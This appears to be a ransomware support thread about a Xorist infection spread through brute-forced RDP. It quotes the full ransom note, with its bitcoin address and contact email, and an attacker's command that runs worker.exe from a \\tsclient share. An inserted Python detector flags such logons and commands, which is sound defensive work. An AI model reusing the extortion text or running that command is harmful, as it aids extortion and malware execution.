Ransomware note with ERROR-ID-63100777


This topic is locked
7 replies to this topic

#1 prasaddlv


Posted 12 June 2017 - 09:39 PM

This morning the ransomware attacked with the following note:

 

All your important files were encrypted on this computer.
You can verify this by click on see files an try open them.

Encrtyption was produced using unique KEY generated for this computer.

To decrypted files, you need to otbtain private key.
The single copy of the private key, with will allow you to decrypt the files, is locate on a secret server on the internet;
The server will destroy the key within 24 hours after encryption completed.
REMEMBER YOU HAVE ONLY 24 HOURS TO PAY EVERITHING IS AUTOMATICALLY!
To retrieve the private key, you need to pay 3 bitcoins

Bitcoins have to be sent to this address: 1JjKYDsYrJGPCzLGGmFL8nM7AvUncd2wYW

After you've sent the payment send us an email to : support_repair@qq.com  with subject : ERROR-ID-63100777(3BTC)
If you are  not familiar with bitcoin you can buy it from here :

SITE : www.localbitcoin.com

After we confirm the payment , we send the private key so you can decrypt your system.

-----------------------------------------------------------------------------------------------------------------------

 

We tried using the Xorist Decryptor (https://decrypter.emsisoft.com/xorist) with the original file and the encrypted file.  But it is showing the following error:

 

---------------------------
No key found
---------------------------
The decrypter could not determine a valid key for your system. Please drag and drop both an encrypted file as well as its unencrypted counterpart onto the decrypter to determine the correct key. Files need to be at least 510 bytes long.


 

This happened even after installing a 30-day trial of anti-malware from Emsisoft (https://www.emsisoft.com/en/business/antimalware/)!!!

 

Please let us know if anyone has the solution.




#2 thyrex


Posted 12 June 2017 - 11:04 PM

Upload some encrypted files to https://sendspace.com and give the download link.


Microsoft MVP 2012-2016 Consumer Security

Microsoft Reconnect 2016


#3 prasaddlv


Posted 12 June 2017 - 11:20 PM

Thanks for the response.

 

Actually, there was some issue with the selected two files.

We tried with a new set of files and it started working.

Currently in the process of decrypting the files.



#4 prasaddlv


Posted 13 June 2017 - 12:05 AM

When we were affected by the same ransomware last week, we took the following precautions after decrypting the files:

 

  • Ensured Windows Update was current
  • Ensured the Microsoft patch for ransomware was installed (KB4012212)
  • Changed the Administrator password and ensured it is strong
  • The system was scanned several times (with software like Malwarebytes, Kaspersky, etc.) and the identified malware was deleted
  • Finally installed a 30-day trial of Anti-Malware from Emsisoft to ensure real-time protection

 

The system was stable for the last 5-6 days. Today it was attacked again.

 

Our system is in a datacenter and we access it using RDP. Could this attack be coming from the datacenter network?

 

Even after taking these measures, how is it able to attack so easily?



#5 jwoods301


Posted 13 June 2017 - 12:16 AM

Brute force attacks using RDP are becoming more and more frequent.

 

See Demonslay335's post here in another thread regarding RDP...

 

https://www.bleepingcomputer.com/forums/t/644140/btcware-ransomware-support-topic-btcware-how-to-fix-hta-read-metxt/?p=4258799

 

As mentioned, VPN is a better solution.


Edited by jwoods301, 13 June 2017 - 12:22 AM.


#6 prasaddlv


Posted 13 June 2017 - 03:57 AM

Shocking thing is that the 30-day trial anti-malware software from emsisoft was removed from the server.

 

When we used it for 5-6 days, the system was absolutely fine.

 

But how is this possible?

 

Can any ransomware delete anti-malware?

 

Or did some hacker really log into the system and manually uninstall it?

 

How can we find out how it was removed?



#7 prasaddlv


Posted 13 June 2017 - 04:01 AM

When we opened the Windows Run command, it showed the following command in the box:

 

cmd.exe /C \\tsclient\fcx\worker.exe xxx.xxx.xxx.xx

 

The IP in the above command is the same as our IP in the data center except for the last part.

 

What is this command trying to do?



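A small detector, added here as an example written for this page and not code from the thread, that scans Windows-style logon and process-creation events for the pattern replies #5 and #7 describe: a burst of failed RDP logons (event 4625, logon type 10) from one address, a later successful RDP logon from the same address, and a process launched from a redirected \\tsclient share. The log lines, format and IP addresses are constructed; a real Security log export has a different layout and needs its own parser.

```python
# Added example for this thread (not code from the posts): flags the two
# signs described in replies #5 and #7 -- an RDP password-guessing burst
# followed by a successful remote logon, and a process started from a
# redirected \\tsclient share. Log lines are CONSTRUCTED in a simplified
# key=value form; a real Security log export needs its own parser.
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = r"""
2017-06-13T02:10:01 EventID=4625 LogonType=10 SrcIP=203.0.113.7 User=administrator
2017-06-13T02:10:02 EventID=4625 LogonType=10 SrcIP=203.0.113.7 User=administrator
2017-06-13T02:10:02 EventID=4625 LogonType=10 SrcIP=203.0.113.7 User=admin
2017-06-13T02:10:03 EventID=4625 LogonType=10 SrcIP=203.0.113.7 User=administrator
2017-06-13T02:10:04 EventID=4625 LogonType=10 SrcIP=203.0.113.7 User=administrator
2017-06-13T02:11:30 EventID=4624 LogonType=10 SrcIP=203.0.113.7 User=administrator
2017-06-13T02:12:05 EventID=4688 User=administrator CommandLine=cmd.exe /C \\tsclient\fcx\worker.exe 198.51.100.9
2017-06-13T03:00:00 EventID=4625 LogonType=10 SrcIP=198.51.100.22 User=bob
"""

def parse(line):
    """Split '<timestamp> k=v k=v [CommandLine=<rest of line>]' into a dict."""
    ts, _, rest = line.partition(" ")
    head, _, cmd = rest.partition("CommandLine=")
    fields = dict(tok.split("=", 1) for tok in head.split())
    fields["ts"] = datetime.fromisoformat(ts)
    if cmd:
        fields["CommandLine"] = cmd
    return fields

def analyze(log, threshold=5, window=timedelta(minutes=5)):
    """Return (finding, detail) tuples in the order they occur in the log."""
    findings, burst_ips = [], set()
    failures = defaultdict(list)  # SrcIP -> times of recent failed RDP logons
    for e in (parse(l) for l in log.splitlines() if l.strip()):
        rdp = e.get("LogonType") == "10"  # logon type 10 = RemoteInteractive (RDP)
        if e.get("EventID") == "4625" and rdp:
            ip = e["SrcIP"]
            failures[ip] = [t for t in failures[ip] if e["ts"] - t <= window]
            failures[ip].append(e["ts"])
            if len(failures[ip]) >= threshold and ip not in burst_ips:
                burst_ips.add(ip)
                findings.append(("rdp_bruteforce", ip))
        elif e.get("EventID") == "4624" and rdp and e["SrcIP"] in burst_ips:
            # a guessed password finally worked: treat the account as compromised
            findings.append(("rdp_login_after_bruteforce", e["SrcIP"]))
        elif e.get("EventID") == "4688" and "\\tsclient\\" in e.get("CommandLine", "").lower():
            # binary executed straight from the RDP client's redirected drive
            findings.append(("exec_from_tsclient", e["CommandLine"]))
    return findings
```

The third finding is the one that matches the Run-box entry quoted above: a \\tsclient path means the file came from the drive of whoever was connected over RDP, not from the server itself.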
#8 quietman7


Posted 13 June 2017 - 05:24 AM

The same thing was reported in this topic a few days ago and confirmed as Xorist.

More likely, the attacker manually removed Emsisoft to ensure the infection was not blocked, since it has an Anti-Ransomware module.

As already noted, there is an ongoing discussion in this topic where victims can post comments, ask questions and seek further assistance. Other victims have been directed there to share information, experiences and suggestions. Rather than have everyone with individual topics, it would be best (and more manageable for staff) if you posted any more questions, comments or requests for assistance in the above support topic discussion. To avoid unnecessary confusion, this topic is closed.

Thanks
The BC Staff
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015
Member of UNITE, Unified Network of Instructors and Trusted Eliminators
